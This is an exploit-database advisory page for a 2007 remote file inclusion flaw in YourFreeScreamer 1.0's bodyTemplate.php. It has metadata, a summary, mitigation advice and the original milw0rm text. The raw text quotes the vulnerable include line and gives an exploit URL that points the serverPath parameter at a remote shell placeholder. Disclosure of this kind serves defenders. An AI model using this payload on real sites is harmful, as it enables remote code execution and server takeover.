header-logo
Suggest Exploit
vendor:
YourFreeScreamer
by:
Crackers_Child
N/A
CVSS
HIGH
The vulnerability exists in the bodyTemplate.php file of YourFreeScreamer 1.0. The script uses the ‘include’ function without proper validation, allowing an attacker to include arbitrary files from the server. By manipulating the ‘serverPath’ parameter in the URL, an attacker can include a malicious file and execute arbitrary code.
98
CWE
Product Name: YourFreeScreamer
Affected Version From: YourFreeScreamer 1.0
Affected Version To: YourFreeScreamer 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

YourFreeScreamer 1.0 Remote File İnclude

The vulnerability exists in the bodyTemplate.php file of YourFreeScreamer 1.0. The script uses the 'include' function without proper validation, allowing an attacker to include arbitrary files from the server. By manipulating the 'serverPath' parameter in the URL, an attacker can include a malicious file and execute arbitrary code.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before including them in the script. Additionally, the use of file inclusion functions should be avoided if possible.
Source

Exploit-DB raw data:

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Title    : YourFreeScreamer 1.0 Remote File İnclude

Author   : Crackers_Child

Contact  : cybermilitan@hotmail.com

Bug      : in bodyTemplate.php " <? include ( $serverPath . "includes/form.php" );?> "

Down     : http://www.yfma.com/count/click.php?id=1
Site	 : http://yfma.com/yfs/

Exploit  : http://site.com/script_path/templates/2blue/bodyTemplate.php?serverPath=Sh3ll ?

Note     : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda]

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

# milw0rm.com [2007-06-17]